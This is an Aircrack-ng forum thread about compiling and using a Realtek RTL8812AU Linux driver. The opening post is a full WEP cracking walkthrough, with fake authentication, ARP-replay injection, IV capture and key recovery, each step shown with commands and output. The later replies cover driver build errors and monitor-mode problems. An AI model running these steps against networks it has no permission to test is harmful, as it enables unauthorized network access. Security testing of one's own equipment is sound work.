Aircrack-ng forum

Please login or register.

Login with username, password and session length
Advanced search  

News:

Aircrack-ng 1.7 release

Sorry Guest, you are banned from posting and sending personal messages on this forum.
This ban is not set to expire.
Pages: [1] 2 3 4   Go Down

Author Topic: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success  (Read 156084 times)

aneki

  • Newbie
  • *
  • Offline Offline
  • Posts: 1

Download the Linux WiFi driver.

https://mega.nz/#!f1FHnT5S!LuYHjVofjRl8TlE7T--anLkV-0zBwko2FFMMCypmlGc
or
https://drive.google.com/file/d/0B5CVb15vbMjCeXJsNUFRUUJPZEE/view?usp=sharing

decompress the driver package,and make for compile it.

#insmod 8812au.ko

1. #ifconfig wlan0 up

    Use follow cmd to replace the airmon-ng start wlan0
2. #iwconfig wlan0 mode monitor

3. #airodump-ng wlan0
    or select a channel to site survey ,example: -c 1 is select channel 1.
    #airodump-ng wlan0 -c 1

 CH  1 ][ Elapsed: 4 s ][ 2015-09-01 12:21                                     
                                                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                               
 00:0B:6B:7F:52:56  -74   0        4        0    0   1  54e. WPA2 CCMP   PSK  000_2G_test                       
 24:DE:C6:50:C4:60  -80   0        0        5    1   1  -1   WPA                                     
 00:26:5A:FF:CB:AB  -35 100       54       11    2   1  54e. WEP  WEP         dlink655                       
 00:1D:73:B4:47:81  -40   0       24        0    0   2  54e. OPN              KKKVAP                         
 00:E0:B9:8C:29:42  -35  40       30        0    0   1  54e  WEP  WEP         RTK 11n AP 2.4G                 
 00:E0:4C:97:2B:A4  -54  49       33       18    0   1  54e  OPN              sd4_open                       
 00:3A:9D:B8:F2:C0  -53   0       54        0    0   1  54e. WPA2 CCMP   PSK  WARPSTAR-EF574E-G               
 06:3A:9D:B8:F2:C0  -55   0       44        0    0   1  54e. WEP  WEP         WARPSTAR-EF574E-GW             
 10:0D:7F:87:C0:39  -49  67       52       53    0   1  54e  OPN              NETGEAR-R6300                   
 20:AA:4B:E4:24:A8  -48  90       46        0    0   1  54e  WPA2 CCMP   PSK  CC_854552_q1                   
 00:18:E7:E1:FB:B6  -56  87       35        0    0   1  54e. WPA2 CCMP   PSK  Chromium                       
 68:A3:C4:E4:4F:DE  -53  50       32        0    0   1  54e  WPA2 CCMP   PSK  SX8ex                           
 00:22:6B:70:D0:5C  -60  40       25        0    0   2  54e  WPA2 CCMP   PSK  Arder_2G                       
 00:88:66:55:AA:BB  -57  43       33        0    0   1  54e  OPN              A_AP_24                         
 84:1B:5E:45:02:E4  -56 100       50        1    0   1  54e  OPN              NETGEAR67                       
 00:23:54:DB:31:B0  -58  67       36        0    0   1  54e. WPA  TKIP   PSK  AAA_RT_N11                     
 00:40:5A:AE:AB:C8  -61  38       27        0    0   3  54e. WPA  TKIP   PSK                         
 98:FC:11:5A:0F:8E  -55  52       30        6    0   3  54e  WPA2 CCMP   PSK  SD4CiscoE1000                   
 00:40:5A:AE:AB:C9  -60  55       32        0    0   3  54e. WPA2 TKIP   PSK  SD1_ADSL                       
 48:EE:0C:2B:57:E4  -63   7        5        0    0   1  54e. WPA2 CCMP   PSK                         
 00:E0:4C:11:11:21  -65  35       30        0    0   1  54e. OPN              NETGEAR57_RPT                   
 10:BF:48:3D:FA:9B  -58  26       16        0    0   1  54e  WPA2 CCMP   PSK  SD1-ASUS                       
 5C:63:BF:38:B0:D2  -66  48       31        0    0   1  54e. WPA2 CCMP   PSK  Atheros_JSW                     
 E4:F4:C6:08:49:3D  -65  44       25        0    0   1  54e  OPN              NETGEAR57                       
 00:E4:10:81:96:D1  -65  38       27        0    0   1  54e  OPN              92E 2.4G                       
 D8:EB:97:2A:5C:6D  -67  28       22        0    0   1  54e. WPA2 CCMP   PSK  KAVEN                           
 00:E0:4C:97:2B:9A  -66  11        8        0    0   1  54e  WPA2 CCMP   MGT  pcache123                       
 3C:1E:04:65:0C:13  -68  16       11        1    0   1  54e  WPA2 CCMP   PSK  MY600M                           
 00:A0:B0:D5:FD:98  -69   0        4        4    0   1  54e. WPA2 CCMP   PSK  2222222222                       
 AC:22:0B:31:B7:00  -68  39       17        0    0   1  54e  WPA2 TKIP   MGT  WlanHCK-3167                     
 00:99:11:22:66:78  -67  33       28        0    0   1  54e  OPN              Amped_TitanEX_2.4               
 10:66:82:1E:77:BE  -68  23       18        2    0   1  54e  WPA2 CCMP   PSK  aterm-19010c-g                 
 8C:BE:BE:04:E7:FB  -69   0        9        0    0   1  54e. WPA2 CCMP   PSK  Xiaomi_RTCN1


4. choice AP's ESSID and ENC is WEP
 00:26:5A:FF:CB:AB  -35 100       54       11    2   1  54e. WEP  WEP         dlink655

 Connect to with AP , -a + ESSID, -h + your WLAN MAC address.
#aireplay-ng -1 0 -a 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0

10:25:59  Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1

10:25:59  Sending Authentication Request (Open System) [ACK]
10:25:59  Authentication successful
10:25:59  Sending Association Request [ACK]
10:25:59  Association successful :-) (AID: 1)

5. Wait to receive a ARP Request,and transmit duplicate ARP attack Packets.
#aireplay-ng -3 -b 00:26:5A:FF:CB:AB -h 5C:F3:70:09:72:07 wlan0

10:26:03  Waiting for beacon frame (BSSID: 00:26:5A:FF:CB:AB) on channel 1
Saving ARP requests in replay_arp-0901-102603.cap
You should also start airodump-ng to capture replies.
58319 packets (got 14550 ARP requests and 23648 ACKs), sent 57675 packets...(499 pps)

6. Open an another window,execute CMD for Capture WEP IVs packet data.
#airodump-ng -c 1 --bssid 00:26:5A:FF:CB:AB -w wep wlan0

 CH  1 ][ Elapsed: 1 min ][ 2015-09-01 10:28                                         
                                                                                                                 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                 
 00:26:5A:FF:CB:AB  -32   6      675    12443   73   1  54e. WEP  WEP         dlink655                           
                                                                                                                 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                       
                                                                                                                 
 00:26:5A:FF:CB:AB  5C:F3:70:09:72:07    0   12 - 1      0    48434

7. Wait for  Capture #DATA number over the 10000,execute crack and find KEY.
  #aircrack-ng -b 00:26:5A:FF:CB:AB wep-01.cap

                                                  Aircrack-ng 1.2 beta3


                                  [00:00:04] Tested 59712 keys (got 10816 IVs)

   KB    depth   byte(vote)
    0    6/  8   BD(14592) 12(14080) 38(14080) BB(14080) D0(14080) 6A(13824) C2(13824) 01(13568)
    1    0/  2   34(18176) 68(15872) D7(14848) E7(14592) 15(14336) EE(14336) F0(14336) 07(14080)
    2    4/ 85   56(14336) 83(14336) BE(14080) C9(14080) 2C(13824) 18(13568) 3C(13568) 43(13568)
    3    2/ 10   78(14848) F0(14848) 08(14848) 5E(14848) 83(14592) 52(14336) E5(14080) 68(14080)
    4    0/  5   90(17664) 85(15360) 07(14848) 67(14592) 12(14592) 82(14336) A0(14336) 0E(14080)

                         KEY FOUND! [ 12:34:56:78:90 ]
 Decrypted correctly: 100%

« Last Edit: September 01, 2015, 05:00:11 am by aneki »
Logged

bubo99

  • Newbie
  • *
  • Offline Offline
  • Posts: 5
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #1 on: September 20, 2015, 10:05:54 pm »

Hello

I'd like to ask: Where did you get the 4.3.22 version? Is there some site with Realtek's newest version or have you found it just by a chance?

Thanks
Logged

misterx

  • Aircrack-ng Author
  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1955
  • Aircrack-ng Author
    • Aircrack-ng
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #2 on: September 21, 2015, 07:49:42 am »

Unfortunately, it doesn't compile on recent kernels and other drivers (on GitHub) don't support monitor mode. And it doesn't look that bright, kernel devs don't seem very interested in having such USB adapter supported (mac80211) anytime soon.
« Last Edit: September 21, 2015, 07:51:44 am by misterx »
Logged

bubo99

  • Newbie
  • *
  • Offline Offline
  • Posts: 5
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #3 on: September 21, 2015, 08:28:07 am »

Unfortunately, it doesn't compile on recent kernels and other drivers (on GitHub) don't support monitor mode. And it doesn't look that bright, kernel devs don't seem very interested in having such USB adapter supported (mac80211) anytime soon.

It's very probable that I can get it working on latest kernels. I maintain Archlinux package with v4.3.14 driver: https://aur.archlinux.org/packages/rtl8812au_rtl8821au-dkms-git/ and https://github.com/Grawp/rtl8812au_rtl8821au . However before I get to work I'd like to know where this .22 version comes from and if we can track the latest Realtek's verison somehow, because I stamped on v4.3.14 just by an accident on some forum ... most people still use/maintain the old 4.3.8 or even 4.2.2 version. It really is a mess!
Logged

misterx

  • Aircrack-ng Author
  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1955
  • Aircrack-ng Author
    • Aircrack-ng
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #4 on: September 22, 2015, 03:48:32 am »

When that happens, let me know so that I can get it integrated in Kali too.
Logged

bubo99

  • Newbie
  • *
  • Offline Offline
  • Posts: 5
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #5 on: September 23, 2015, 08:44:36 am »

When that happens, let me know so that I can get it integrated in Kali too.

OK
Btw. I'm still waiting for a reply from @aneki to see if he has some good source of latest Realtek drivers though.
Logged

ninebits

  • Guest
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #6 on: October 01, 2015, 08:20:57 pm »

hey guys, I was able to get the driver to compile on Ubuntu 14.04 LTS and run a successful injection test (aireplay-ng -9 wlan0). I do believe, however, there are some bugs that need fixing. Here's a list of what I found:
1. (not really a bug) Certain manufactures selling the RTL8812AU are not listed in the source code, I'm using a TP-Link and I had to hard code the USB device ID.
2. The system can potentially hang either when putting the card into monitor mode or starting airodump-ng. The error message displayed is "RTL871X: HwRateToMRate(): Non Supported Rate [ff]!!! "
3. Manually restricting the adapter to a single channel doesn't seem to take. I tested this by restricting it to only a and it jumped back to bg after starting airodump. I also couldn't see any traffic on a, at all. I have about a dozen Cisco aps around me all running ac and nothing was picked up.
4. Airmon-ng doesn't see the card, I have to put it into monitor mode using iwconfig

I'm gonna try to play around with it a little bit more and see if the experience can be improved.
Logged

bubo99

  • Newbie
  • *
  • Offline Offline
  • Posts: 5
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #7 on: October 03, 2015, 11:08:09 pm »

hey guys, I was able to get the driver to compile on Ubuntu 14.04 LTS and run a successful injection test (aireplay-ng -9 wlan0). I do believe, however, there are some bugs that need fixing. Here's a list of what I found:
1. (not really a bug) Certain manufactures selling the RTL8812AU are not listed in the source code, I'm using a TP-Link and I had to hard code the USB device ID.
2. The system can potentially hang either when putting the card into monitor mode or starting airodump-ng. The error message displayed is "RTL871X: HwRateToMRate(): Non Supported Rate [ff]!!! "
3. Manually restricting the adapter to a single channel doesn't seem to take. I tested this by restricting it to only a and it jumped back to bg after starting airodump. I also couldn't see any traffic on a, at all. I have about a dozen Cisco aps around me all running ac and nothing was picked up.
4. Airmon-ng doesn't see the card, I have to put it into monitor mode using iwconfig

I'm gonna try to play around with it a little bit more and see if the experience can be improved.
Have you noticed the filename of the archive? rtl8812AU_8821AU_linux_v4.3.22_15054.20150901_beta.tar.gz .. The _beta suffix is quite .. unsettling.
Btw. I have a patched driver - compile-able on Linux 4.2 - on my github: https://github.com/Grawp/rtl8812au_rtl8821au/tree/4.3.22
Logged

misterx

  • Aircrack-ng Author
  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1955
  • Aircrack-ng Author
    • Aircrack-ng
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #8 on: October 04, 2015, 02:33:13 am »

Quick question: do we just have to run 'make' to compile?

If yes, would you be able to make it compilable on Kali 2.0? Here is the compile log:

Code: [Select]
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.0.0-kali1-amd64/build M=/root/8812AU/rtl8812au_rtl8821au  modules
make[1]: Entering directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:10: *** mixed implicit and normal rules: deprecated syntax
  CC [M]  /root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o
cc1: error: -Werror=incompatible-pointer-types: no option -Wincompatible-pointer-types
/usr/src/linux-headers-4.0.0-kali1-common/scripts/Makefile.build:263: recipe for target '/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o' failed
make[4]: *** [/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o] Error 1
/usr/src/linux-headers-4.0.0-kali1-common/Makefile:1407: recipe for target '_module_/root/8812AU/rtl8812au_rtl8821au' failed
make[3]: *** [_module_/root/8812AU/rtl8812au_rtl8821au] Error 2
Makefile:145: recipe for target 'sub-make' failed
make[2]: *** [sub-make] Error 2
Makefile:8: recipe for target 'all' failed
make[1]: *** [all] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:1565: recipe for target 'modules' failed
make: *** [modules] Error 2
Logged

ninebits

  • Guest
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #9 on: October 04, 2015, 03:46:46 am »

Some good news, after installing aircrack-ng from the latest source files airodump isn't hanging the system anymore. It's actually pretty usable right now. However the "Non supported rate" error message still gets logged.

Originally I thought the problem was the driver because i had the system croke not only when starting airodump but it also happened a couple of times when putting the card into monitor mode,  although this wasn't happening often. I got suspicious when wireshark had no issues capturing traffic, then I noticed a big version difference between Ubuntu's reps and the site.

I know the driver is only a beta (i was actually reluctant to try it at first) but honestly now it's running surprisingly smooth on both frequencies.
Logged

bubo99

  • Newbie
  • *
  • Offline Offline
  • Posts: 5
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #10 on: October 04, 2015, 07:31:37 am »

Quick question: do we just have to run 'make' to compile?

If yes, would you be able to make it compilable on Kali 2.0? Here is the compile log:

Code: [Select]
make ARCH=x86_64 CROSS_COMPILE= -C /lib/modules/4.0.0-kali1-amd64/build M=/root/8812AU/rtl8812au_rtl8821au  modules
make[1]: Entering directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:10: *** mixed implicit and normal rules: deprecated syntax
  CC [M]  /root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o
cc1: error: -Werror=incompatible-pointer-types: no option -Wincompatible-pointer-types
/usr/src/linux-headers-4.0.0-kali1-common/scripts/Makefile.build:263: recipe for target '/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o' failed
make[4]: *** [/root/8812AU/rtl8812au_rtl8821au/core/rtw_cmd.o] Error 1
/usr/src/linux-headers-4.0.0-kali1-common/Makefile:1407: recipe for target '_module_/root/8812AU/rtl8812au_rtl8821au' failed
make[3]: *** [_module_/root/8812AU/rtl8812au_rtl8821au] Error 2
Makefile:145: recipe for target 'sub-make' failed
make[2]: *** [sub-make] Error 2
Makefile:8: recipe for target 'all' failed
make[1]: *** [all] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.0.0-kali1-amd64'
Makefile:1565: recipe for target 'modules' failed
make: *** [modules] Error 2
Just plain 'make' suffices. Seems like old GCC is causing the problem. See https://github.com/Grawp/rtl8812au_rtl8821au/issues/1 . Disable the option or use newer GCC.
Logged

kwidugmd8373

  • Newbie
  • *
  • Offline Offline
  • Posts: 1
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #11 on: October 12, 2015, 01:19:46 pm »

Hello from Russia!
Firstly, I want to thank you for this driver. (I was already thinking about how to sell my DWA-171 dongle)
Secondly, I'd like to mention here an error occured while I was trying to compile.

Here is the error (file rtw_debug.c):

In function 'dump _drv_version':
71:64: error: macro "__DATE__"might prevent reproducible builds [-Werre-date-time]
71:64: error: macro "__TIME__"might prevent reproducible builds [-Werre-date-time]


I have fixed this by deleting the line "DBG_871X_SEL_NL(sel, "build time: %s %s\n", __DATE__, __TIME__);"

Pros of using your driver:

1) Ability to use monitor mode.
2) The system no more hanging after usb wifi device disconnect.

One more time. Thank you.
Logged

fenixdoido

  • Newbie
  • *
  • Offline Offline
  • Posts: 3
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #12 on: November 06, 2015, 03:12:04 pm »

Hello guys.
I have a Edimax AC600 RTL8812au Dual Band device and I`m using Kali Sana.
First i downloaded the driver on op post, edited device on os_dep/linux/usb_intf.c to add the ID
Code: [Select]
{USB_DEVICE(0x7392, 0xA812),.driver_info = RTL8812}, /* Edimax - Edimax */
Then i had to disable that _DATE_ errors and finally make/make install/reboot.

Ok,

Code: [Select]
root@kali:~# iwconfig
wlan3     unassociated  Nickname:"<WIFI@REALTEK>"
          Mode:Managed  Frequency=2.412 GHz  Access Point: Not-Associated   
          Sensitivity:0/0 
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

eth0      no wireless extensions.


Code: [Select]
root@kali:~# airmon-ng
PHY Interface Driver Chipset

phy1 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy0 wlan3 rtl8821au Edimax Technology Co., Ltd

Code: [Select]
root@kali:~# airmon-ng start wlan3
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
  650 NetworkManager
  752 wpa_supplicant
  864 avahi-daemon
  865 avahi-daemon
 1409 dhclient

PHY Interface Driver Chipset

phy1 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy0 wlan3 rtl8821au Edimax Technology Co., Ltd command failed: Operation not supported (-95)

(mac80211 monitor mode vif enabled for [phy0]wlan3 on [phy0]wlan3mon)
(mac80211 station mode vif disabled for [phy0]wlan3)

Code: [Select]
root@kali:~# iwconfig
wlan3mon  IEEE 802.11abg  Mode:Monitor  Tx-Power=12 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
         
Code: [Select]
airodump-ng wlan3mon
 CH 10 ][ Elapsed: 48 s ][ 2015-11-06 12:55                                         
                                                                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                               
                                                                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                     
                                                                                                                   

Code: [Select]
root@kali:~# aireplay-ng -9 wlan3mon
12:55:59  Trying broadcast probe requests...
12:56:01  No Answer...
12:56:01  Found 0 APs
root@kali:~# aireplay-ng -9 wlan3mon
12:56:03  Trying broadcast probe requests...
12:56:05  No Answer...
12:56:05  Found 0 APs

Code: [Select]
root@kali:~# lsusb
Bus 001 Device 002: ID 7392:a812 Edimax Technology Co., Ltd

If i try to stop it using airmon-ng
Code: [Select]
root@kali:~# airmon-ng stop wlan3mon
PHY Interface Driver Chipset

phy1 wlan0 ath9k Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)

ethtool failed...
Only mac80211 devices on kernel 2.6.33 or higher are officially supported by airmon-ng.


Anything i can do to try to fix this?
« Last Edit: November 06, 2015, 03:13:35 pm by fenixdoido »
Logged

misterx

  • Aircrack-ng Author
  • Administrator
  • Hero Member
  • *****
  • Offline Offline
  • Posts: 1955
  • Aircrack-ng Author
    • Aircrack-ng
Re: Realtek RTL8812AU 8811AU Linux Driver with Aircrack-ng wep crack success
« Reply #13 on: November 07, 2015, 12:21:14 am »

First thing to do is killing network managers. Not after putting in monitor mode, before. Solves 99% of the issues.
Logged

kcdtv

  • Experienced
  • Full Member
  • ********
  • Offline Offline
  • Posts: 212

Hi there!  :)
I am trying to get this USB to work properly
I am using kali rolling updated
Code: [Select]
4.5.0-kali1-amd64 #1 SMP Debian 4.5.3-2kali1 (2016-05-09) x86_64 GNU/Linux
I use the driver downloaded form this github branch https://github.com/diederikdehaas/rtl8812AU because i didn't have any error compiling
Code: [Select]
git clone https://github.com/diederikdehaas/rtl8812AU.git && cd rtl8812AU && make && sudo make install
  In mode manged, it is... simply the best.
Amazing USB in 2.4 Ghz and 5 Ghz frequencies.

  Mode monitor... mission is possible with iwconfig, very good sensibilty, but injection doesn't works
I sent form time to time a single ACK while i desauth and injection test looks like this

i don't put the 20 PA because it is all the same : 0% injection rate

  with airmon-ng that what happens
Code: [Select]
sudo airmon-ng

PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy15 wlan1 ?????? Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
The driver is not properly detected.
First question : How could i repair that? 

than i check kill and start monitor mode
Code: [Select]
sudo airmon-ng check kill

Killing these processes:

  PID Name
  674 wpa_supplicant
 3205 avahi-daemon-ch
Code: [Select]
sudo airmon-ng start wlan1


PHY Interface Driver Chipset

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy15 wlan1 ?????? Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac WLAN Adapter
cat: /sys/class/ieee80211/phy15/device/net/wlan1mon/type: No existe el fichero o el directorio

Newly created monitor mode interface wlan1mon is *NOT* in monitor mode.
Removing non-monitor wlan1mon interface...


airmon-ng is not able to create wlan1mon folder instead of wlan1.
Any idea to solve this problem?
Could fenixdoido upload the folder he gets as he manage to create one (i would like to play around with it)
I tryed to made some mod of the driver but i am useless and very limited, i don't know a shit  :P
dmseg des not tel much,,,
could that be a hint?
Code: [Select]
[ 9244.665299] RTL871X: nolinked power save enter
[ 9249.810218] RTL871X: nolinked power save leave

this is a great USB, it would be so nice to get it works properly...
Cheers
Logged
Pages: [1] 2 3 4   Go Up